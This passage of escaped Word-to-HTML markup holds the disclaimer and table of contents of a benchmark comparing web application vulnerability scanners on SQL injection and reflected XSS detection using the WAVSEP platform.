   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Reference&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Reference&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; Name=&quot;Bibliography&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:&quot;Table Normal&quot;;
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-priority:99;
	mso-style-qformat:yes;
	mso-style-parent:&quot;&quot;;
	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
	mso-para-margin-top:0cm;
	mso-para-margin-right:0cm;
	mso-para-margin-bottom:10.0pt;
	mso-para-margin-left:0cm;
	line-height:115%;
	mso-pagination:widow-orphan;
	font-size:11.0pt;
	font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;
	mso-ascii-font-family:Calibri;
	mso-ascii-theme-font:minor-latin;
	mso-fareast-font-family:&quot;Times New Roman&quot;;
	mso-fareast-theme-font:minor-fareast;
	mso-hansi-font-family:Calibri;
	mso-hansi-theme-font:minor-latin;}
&lt;/style&gt; &lt;![endif]--&gt;  &lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;u&gt;&lt;b&gt;Disclaimer&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The results of this research are &lt;b&gt;only&lt;/b&gt; valid for estimating the detection accuracy of SQLi &amp;amp; RXSS exposures, and for counting and comparing the various features of the tested tools.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;The author did &lt;b&gt;not&lt;/b&gt; evaluate every possible feature of each product, only the categories tested within the research, and thus, does not claim to be able to estimate the ROI from each individual product.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;Furthermore, several vendors invested resources in improving their tools according to the recommendations of the &lt;b&gt;WAVSEP&lt;/b&gt; platform which was &lt;b&gt;publically available&lt;/b&gt; since December 2010. Some of them did so without any relation to the benchmark (and before they were aware of it), and some in preparation for it. Since the special structure of the WAVSEP testing platform &lt;b&gt;actually&lt;/b&gt; requires the vendor to &lt;b&gt;cover more vulnerable test scenarios&lt;/b&gt;, that action actually improves the detection ratio of the tool in any application (for the exposures covered by WAVSEP).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;It is however, &lt;b&gt;important&lt;/b&gt; to mention that a few vendors were not notified on this benchmark, &lt;b&gt;and&lt;/b&gt; were not aware of the existence of the WAVSEP platform, and thus, could not have enhanced their tools in preparation for this benchmark (&lt;b&gt;HP Webinspect&lt;/b&gt;, &lt;b&gt;Tenable Nessus&lt;/b&gt;, and &lt;b&gt;Janus security Webcruiser&lt;/b&gt;), while other vendors that were tested in the initial research phases released updated versions that were &lt;b&gt;&lt;u&gt;not&lt;/u&gt;&lt;/b&gt; tested (&lt;b&gt;&lt;i&gt;Portswigger Burpsuite&lt;/i&gt;&lt;/b&gt; and &lt;b&gt;&lt;i&gt;Cenzic Hailstorm&lt;/i&gt;&lt;/b&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;That being said, the benchmark does represent the accuracy level of each tool in the date it was tested (the results of the &lt;b&gt;&lt;i&gt;vast majority&lt;/i&gt;&lt;/b&gt; of the tools are valid for the date this research was released), &lt;b&gt;but&lt;/b&gt; future benchmark will use a different research model in order to ensure that the competition will be fair for all vendors.&lt;/div&gt;&lt;/div&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: Calibri,sans-serif; font-size: 11pt; line-height: 115%;&quot;&gt; &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;  &lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;w:sdt docparttype=&quot;Table of Contents&quot; docpartunique=&quot;t&quot; id=&quot;97746473&quot; sdtdocpart=&quot;t&quot;&gt;  &lt;/w:sdt&gt;&lt;br /&gt;
&lt;div class=&quot;MsoTocHeading&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Table of Contents&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;color: black; font-size: 11pt; font-weight: normal; line-height: 115%;&quot;&gt;&lt;w:sdtpr&gt;&lt;/w:sdtpr&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;1. Prologue&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;2. List of Tested Web Application Scanners&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;3. Benchmark Overview &amp;amp; Assessment  Criteria&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;5&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;4. Test I – The More The Merrier – Counting  Audit Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;5. Test II – To the Victor Go the Spoils –  SQL Injection&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;6. Test III – I Fight (For) the Users –  Reflected XSS&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;7&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;7. Test IV – Knowledge is Power - Feature  Comparison&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;7&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;8. What Changed?&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;8&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;9. Initial Conclusions – Open Source vs.  Commercial&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt; &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;9&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;10. Morale Issues in Commercial Product  Benchmarks&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;9&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;11. Verifying The Benchmark Results&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;11&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;12. Notifications and Clarifications&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;11&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;13. List of Tested Scanners&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;12&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;14. Source, License and Technical Details of  Tested Scanners&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;12&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;15. Comparison of Active Vulnerability  Detection Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;13&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;16. Comparison of Complementary Scanning  Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;14&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;17. Comparison of Usability and Coverage  Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;15&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;18. Comparison of Connection and  Authentication Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;15&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;19. Comparison of Advanced Features&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;16&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;20. Detailed Results: Reflected XSS  Detection Accuracy&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;16&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;21. Detailed Results: SQL Injection  Detection Accuracy&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;16&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;22. Drilldown – Error Based SQL Injection  Detection&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;16&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;23. Drilldown – Blind &amp;amp; Time Based SQL  Injection Detection&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;16&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;24. Technical Benchmark Conclusions –  Vendors &amp;amp; Users&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;17&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;25. So What Now?&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;17&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;26. Recommended Reading List: Scanner  Benchmarks&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;18&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;27. Thank-You Note&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;19&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoToc1&quot;&gt;&lt;span class=&quot;MsoHyperlink&quot;&gt;&lt;span lang=&quot;AR-SA&quot; style=&quot;font-family: Arial,sans-serif;&quot;&gt;&lt;b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Calibri,sans-serif;&quot;&gt;28. Frequently Asked Questions&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: none;&quot;&gt;. &lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;color: black; display: none; font-family: Calibri,sans-serif; text-decoration: 